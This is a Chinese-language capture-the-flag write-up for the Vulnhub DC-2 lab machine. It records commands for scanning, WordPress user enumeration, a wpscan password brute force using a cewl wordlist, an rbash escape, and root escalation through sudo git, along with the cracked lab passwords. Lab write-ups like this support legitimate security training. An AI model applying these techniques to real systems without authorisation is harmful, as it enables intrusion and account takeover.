Vulnhub 靶机实战系列:DC -2
信息收集
内网扫描
arp-scan -l
Kali ip: 192.168.175.134
DC-2 ip:192.168.175.135
扫描主机
nmap -A 192.168.175.135
80/tcp open
nmap -sV -p- 192.168.175.135 //-sV 扫描目标主机和端口上运行的软件的版本;-p- 扫描0-65535全部端口
80/tcp open http
7744/tcp open ssh
Flag1
访问192.168.175.135 本地无法解析域名dc-2
添加hosts文件
vim /etc/hosts //编辑/etc/hosts文件,添加靶机IP地址及域名
在Flag页面找到flag1
提示用cewl密码字典生成工具
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
Flag2
flag1提示可以登录,但正常访问网页无法找到登录页面,
nikto -h dc-2 -o nikto-dc2.txt //nikto 扫描网站结构
cat dc-2.nikto
http://dc-2/wp-login.php //wp模板后台登陆页面默认是wp-login.php
访问登录页面:http://dc-2/wp-login.php
wpscan工具扫描网站
wpscan --url dc-2 -e u //wpscan工具扫描网站
User(s) Identified: admin jerry tom
添加用户名
vim dc-2users.list //将扫描到的三个用户名添加到dc-2users.list
//新建一个.list文件(例如:dc-2users.list)将扫描到的三个用户名添加到该文件中。
生成密码字典
cewl dc-2 -w dc-2.dic //使用flag1中提示的工具cewl生成密码字典dc-2.dic
wpscan爆破
wpscan --url dc-2 -U dc-2users.list -P dc-2.dic //使用wpscan工具爆破可以登录用户的密码,可成功爆破tom和jerry用户
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
使用tom登录,没找到有用信息
使用jerry登录,找到flag2
jerry login
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
Flag3
ssh登录
ssh tom@192.168.175.135 -p 7744 //tom ssh登录
flag3 :
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
Flag4
设置环境变量
BASH_CMDS[a]=/bin/sh //调用/bin/sh命令解释器
a //a 命令 切换了命令解释器为 /bin/sh 突破了 rbash的限制
/bin/bash //使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin //设置环境变量
su jerry //切换到jerry用户
adipiscing //jerry用户登录密码
Flag4:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
Final Flag
提权
sudo -l //查看可以使用root权限无密码的命令,有git命令
sudo git -p --help //提权
!/bin/bash //获得root权限
修改密码
passwd root //修改root密码
111111 //密码修改为:11111
su root //切换root用户
cd /root //进入root目录
ls //找到final-flag.txt